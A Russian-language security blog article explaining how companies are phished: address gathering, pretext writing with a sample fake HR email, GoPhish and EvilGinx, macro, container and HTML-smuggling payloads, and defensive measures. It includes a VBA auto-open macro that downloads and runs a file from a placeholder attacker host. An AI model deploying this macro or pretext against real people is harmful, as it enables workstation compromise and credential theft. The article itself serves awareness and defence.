Фишинг. Как компании ловят на крючок?

17.07.2023 | Категория Информационная безопасность

Фишинг. Как компании ловят на крючок?

Думаю, все из вас знакомы с понятием фишинга. Каждый так или иначе видел его в разных проявлениях. Будь то криво сделанная фишинговая страница ВКонтакте для получения ваших паролей, будь то очередная новость про взлом крупной компании от так сильно нашумевших группировок-вымогателей.

Но суть фишинга остается одной и той же: письмо - действие - данные.

Данная статья будет разделена на две части:

  1. Составление и доставка письма злоумышленниками
  2. Полезная нагрузка в письме

ДИСКЛЕЙМЕР: автор статьи и ресурс, на котором статья размещена - не несут ответственности за противоправные действия читателей. Статья написана исключительно в образовательных целях.

Составление и доставка письма злоумышленникамиРазнообразие способа проведения фишинговых атак поистине огромно. Телефонные звонки, сообщения в мессенджерах, классические письма на корпоративные адреса, мимикрия под службу поддержки и так далее.

Очевидно, что самым распространенным способом атак на компании будет являться именно фишинг через электронную почту.

 В сути своей в глазах злоумышленника идея максимально проста:

  1. Собрать почты.
  2. Составить письмо.
  3. Отправить письмо.
  4. Побудить пользователя сделать определенные действия.
  5. Получить логин:пароль или доступ к его рабочей станции.

Звучит для обывателя как всегда просто, но на практике все не так однозначно.

Как же вообще злоумышленники собирают почты той или иной компании?

Первым делом им на помощь приходит OSINT.

Если компания техническая и крупная, то она наверняка имеет свою страничку в небезызвестном LinkedIn, где в профиле могут быть присоединены сотрудники компании, оставляющие в профилях свою почту. Так же можно делать и с группами в иных соцсетях, собрать почты по сайту и т.д. Были случаи, когда фишеры втирались в доверие к ИБ специалистам, публикуя ресерчи и минимально ведя переписку со специалистами, после чего кидали якобы новое CVE, открытие файла с подробностями которого и приводило к печальным последствиям.

Если почты собираются автоматически(тем же the harvester), то можно их банально верифицировать через подключение к серверу по telnet и т.д. Если резюмировать, то способов сбора и верификации предостаточно, но т.к фишинг атака социальная, то и таргет адресов нужно проводить соответствующий.

Как мошенник будет составлять хорошее фишинговое письмо?

Самый главный аспект фишинговой компании - претекст. То бишь текст письма, который ОБЯЗАН побудить пользователя совершить действия, с помощью которых злоумышленник его и скомпрометирует.

В общем и целом есть два основных способа компрометации путем применения фишинга, которые так или иначе влияют на претекст:

  1.  Attachment. Фишинг, основанный на побуждении пользователя открыть вредоносное вложение, создание которых мы обсудим ниже.
  2. Link. Фишинг, основанный на побуждении пользователя в открытии ссылки, где он либо введет свои данные от рабочей станции/локального ресурса, скачает вредоносный файл и т.д.

Сразу дам небольшой спойлер - attachment атаки не самый лучший выбор преступниками, но.... мы так же обсудим это ниже, все не так просто.

Итак, у мошенников есть два варианта: ссылка или файл. Именно от этого и будем отталкиваться при составлении претекста.

  1. Злоумышленники собирают как можно больше информации об атакуемой компании и ее подрядчиках

Любые виды OSINT или автоматизированного сканирования. Любые виды взаимодействия и сбора информации всего обо всем. Фаззинг любых документов на ресурсах компании(например при помощи FOCA). Это может дать ценнейшие данные о сотрудниках и построении древа подчинения, так же фаззинг документов может помочь в понимании формата официальных заявлений, документов и прочего, что само собой применимо в письме.

Не так давно по меркам ИБ нашумели атаки Supply Chain, в которых атаковалась не основная компания, а ее менее защищенные подрядчики, которые так или иначе находились в сегменте сети. Поэтому полезна информация не только об основной компании, а так же об ее подрядчиках. 

  1. Немного психологии

Само собой, писать отсебятину в формате дружественного письма, отправляя какой-то документ якобы «на проверку» - не самый лучший вариант для преступника. Стоит банально пообщаться с тех поддержкой ресурса, дабы примерно понять официоз ответов и понять формат сообщений компании.

Само собой, в рамках атаки мошенникам нужно составить претекст состоящий из срочности и небольшого давления от начальства.

Почему бы, например, не сделать претекст ни к чему не принуждающий, но подчеркивающий важность?

Если структурировать и разворачивать мысль, то вот критерии письма, которое может повлиять на пользователя:

  1. Последовательность. Изложить мысли понятно, четко и последовательно
  2. Уважение. Наверняка вы часто видели в ответах на ваши письма финальные форматные строки: «С уважением, Иван Иванович»
  3. Ответственность и обязательность. У любого сотрудника есть зона ответственности, которой он обязательно должен придерживаться. Если фишинг идет, например, в службу поддержки, то для банального примера можно привести такой претекст: «Напоминаем, что сотрудники службы поддержки несут ответственность за ... Рекомендуется проследовать инструкциям ....»
  1. Пример и небольшие дополнения

А теперь давайте разберем пример фишингового претекста, используя минимальные знания выше:

Внимание! Важные изменения! (привлечение внимания)

Хотим напомнить, что сотрудники отдела кадров с 12.02.23 несут ответственность за перевыпуск бумажных анкет отдела технической поддержки в цифровом варианте до 12.04.23. Инструкция по выполнению переноса анкет. (важность и срочность)

С уважением, руководитель отдела кадров московского филиала И.И.Иванов (уважение, симпатия)

Само собой, злоумышленники должны знать настоящие ФИО руководителей, правильные названия отдела и хотя-бы немного интересоваться работой компании, вдруг именно с 12.02.23 до 12.04.23 были уволены все люди из тех. поддержки по каким-то мифическим причинам?

Так же если письма от компании обернуты в специальный шаблон, его так же нужно копируют и рассылают только с ним.

При этом ни в коем случае злоумышленники не используют слова триггеры по типу: кликни на ссылку, скачай файл, убери все ограничения на загрузку, включи макросы и т.д.

В официальном обращении мало кто будет использовать эти фразы, они их заменят на что-то по типу: ознакомьтесь с документом, отредактируйте ведомость, если будут какие-то проблемы с таблицей из-за некорректного отображения графиков, писать на [email protected].

Как злоумышленники рассылают письма?

Рассмотрим популярные инструменты и поймем для автоматизированной отправки писем и обхода второго фактора.

GoPhish

Бесспорно самый популярный и удобный инструмент для рассылки пользователям. В нем есть настройка функционала абсолютно под все: начиная выбором адресов, с которых преступники будут слать письма, заканчивая встроенным клонером сайтом и шаблонизатором. (например, можно автоматически вставить по шаблону заданное имя пользователя на его же аккаунте почты, что может внушать больше доверия, если информации о хосте не так много)

EvilGinx

В любой компании так или иначе реализована технология 2FA, где любое действие юзера должно подтверждаться кодами из смс или с того же Google Authenticator. На помощь злоумышленникам в байпасе 2FA как раз и приходит EvilGinx, который разворачивается в инфраструктуре злоумышленника и выступает в роли реверс-прокси, который запоминает данные и ворует куки пользователя, дабы пройти 2FA.

Evilgophish

Комментарии излишни, удобная комбинация всего и сразу.

Полезная нагрузка письма

Полезной нагрузкой(или же payload’ом) - называется вредоносная программа, скрипт или макрос в документе Microsoft Office, который будет либо давать креды пользователя, либо даст возможность получить удаленный доступ до рабочей станции жертвы.

Attachments

  1. Вредоносные макросы VBA

Думаю, ни для кого не будет открытием, если я скажу, что большая часть атак(по крайней мере пару лет назад) была именно с использованием макросов в документах Microsoft Office.

Возьмем один из самых олдскульных форматов макросов XLM, которые на данный момент никуда не годятся для фишинговых кампаний на крупные компании, но для общего понимания происходящего они нам точно нужны.

Так же все наверняка знают про желтое окно сверху над документом, где просят разрешить включение макросов.

Раньше был очень интересный способ побудить пользователя включить макросы внутри документов:

Делалось огромное изображение внутри документа на всю таблицу, которое было похоже на официальное уведомление Microsoft, которое сообщало, что для просмотра документа нужно нажать кнопку Enable.

Давайте разберем, например такой макрос:

Private Sub Document_Open()
  Shell("C:\tools\shell.cmd")
End Sub

Это самый простой вид макроса, который при открытии документа запустил shell.cmd, но какой от этого макроса толк? Давайте немного перепишем код:

Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")xHttp.Open "GET", "http://IP_ATTACKER:PORT/FILENAME", FalsexHttp.Send
With bStrm
 .Type = 1
 .Open
 .write xHttp.responseBody
 .savetofile "attacker_shell.exe", 2
Shell ("attacker_shell.exe")
End Sub

В этом примере код немного умнее и подгружает на компьютер жертвы файл с контролируемого нами сервера. Тут сразу стоит оговориться и объяснить, что злоумышленники не будут этого делать со своего белого айпи по понятным причинам.

Что будут использовать преступники для хостинга вредоноса для получения доступа к станции сотрудника:

  1. Хостинг на облаках(Google Drive, Yandex Cloud)
  2. Хостинг на уже скомпрометированном ресурсе компании(например мошенники провели атаку File Upload и после захвата хоста могут хостить файл на сервере, который скорее всего не будет в блэклистах)
  3. Хостинг на githubusercontent

Вообще, наверно самым популярным механизмом компаний по защите от злоумышленников является Mark Of The Web (MOTW). Его суть заключается в том, что механизм защиты помечает файлы загруженные из посторонних источников, и открывает их в специальном режиме. Поэтому стандартные «кликните на включение макросов» с мало мальски знакомыми с безопасностью компаниями уже не сработает, макрос просто не сработает должным образом.

Но как я уже упоминал выше, вектор атаки с вложенными макросами является устаревшим и как правило помимо обфускации макроса нужно так же очень постараться сделать рабочий пейлоад, который этот макрос будет «подтягивать» с сервера преступника. Главной проблемой является не столько банальный механизм защиты проверки вложений документов почтовым шлюзом, сколько песочница, которая так или иначе отдаст сэмпл нагрузки на динамику.

  1. Контейнеры. Следующая ветвь развития Attachment векторов.

В общем и целом никто не мешает не внедрять макрос в офисный документ. Просто это по своему сильнее побуждает пользователя открыть файл, т.к в рамках компаний офисные документы используются часто.

Но можно же просто дать пользователю файл с расширением .iso, .lnk, .msi и т.д. Ведь так..?

Следующей ступенью attachment векторов стали так называемые контейнеры.

То есть пейлоад зашивался внутрь, например, 7zip архива (что на данный момент не совсем хорошее решение, т.к MOTW уже стоит по умолчанию в 7zip, плюсом не всегда есть ПО, способное открыть такой вид архивов). Другим видом контейнеризации является создание, например, ISO файлов, которые в фишинговых компаниях различных группировок использовали CVE (в том же Flash или продуктах Microsoft Office), проводящие байпас MOTW. Так же очень высокую эффективность показали LNK файлы, так же вызывающие MSI нагрузки.

Помимо контейнеров пейлоады можно «засунуть» в так называемый .chm (compiled html help file), в котором будет подтягивание малвари. В чем плюс CHM? Да в том, что его для просмотра его содержимого нужно специальное ПО. И только этим ПО можно понять, что CHM файл содержит не совсем то, что нужно компании.

За реальным кейсом далеко ходить не нужно.

Китайскую атомную промышленность атаковали следующим образом:

Рассылались письма якобы от посольства Кыргызстана с приглашением на конференцию, где был аттачмент с RAR архивом, содержащим CHM файл, который «тянул» MSI пейлоад для захвата рабочей станции. Первая версия файла CHM создавала запланированную задачу, которая использовала двоичный файл MSIEXEC для выполнения удаленной полезной нагрузки MSI из C2.

Подводя итоги рассказа про Attachment вектора стоит сказать, что очень хорошим решением будет взглянуть на ретроспективу атак APT группировок, которые так или иначе использовали способы выше. Помимо самих вложений они использовали и CVE, далеко не самые стандартные решения и интересные инструментарии. Ознакомится с разборами таких кампаний можно, естественно, на ресурсе Mitre ATT&CK, где достаточно подробно разобраны кейсы атак.

  1. Links

Общая суть максимально проста: злоумышленники дают пользователю фишинговую ссылку для ввода своих кредов с возможным перехватом 2FA или ссылку на скачивание файла.

Почему ссылки?

  1. Устойчивость к СЗИ
  2. Устойчивость к песочницам, те же правила YARA будут смотреть именно код html странички(да, так же посмотрят ссылку, но сложно предугадать, что именно будет скачано). То бишь содержимое файла, который будет загружен, не попадет на динамику.

HTML Smuggling как популярный способ доставки

Еще одним крайне популярным способом является так называемый HTML Smuggling.

Суть способа доставки нагрузки состоит в том, что мошенники прикрепляют ссылку к письму, которая ведет на подконтрольный преступниками ресурс, html код которого обфусцирован и нацелен только на одно действие - дроп нагрузки до пользователя специальной ссылкой, скрытой в сайте. То бишь решается сразу две проблемы: СЗИ на почте и динамический анализ нагрузки. Плюсом ко всему не будет подозрительного трафика и все будет выполняться через легитимные функции HTML и JS кода.

Суть работы строится лишь на одном атрибуте download:

Клик

Тут можно сразу вернуться к тексту выше о том, где лучше хостить нагрузки.

Как защитить компанию от фишинга?

  1. Самое банальное, но самое важное - обучить сотрудников распознаванию фишинга. (так же не наказывать их при неудачах)
  2. Так или иначе внедрить СЗИ и Sandbox, как защиту от скрипт-кидди.
  3. Мониторинг командой кибербезопасности MITRE, дабы знать все приходящие и уходящие тренды атак на компании.
  4. Внедрение FIDO2 MFA ключей
  5. Своевременное информирование сотрудников о фишинговых атаках
  6. Проведение регулярных пентестов, включая социальные атаки.

В заключение, фишинг - это серьезная угроза, с которой сталкиваются миллионы интернет-пользователей по всему миру. Помимо понимания защиты компании от фишинга, не стоит пренебрегать и личной безопасностью при прочтении подозрительных писем.

Телефон: +7 499 444 17 50 | 8 800 444 17 50 бесплатно по России | E-mail: [email protected]
Все курсы Партнерам Возврат Контакты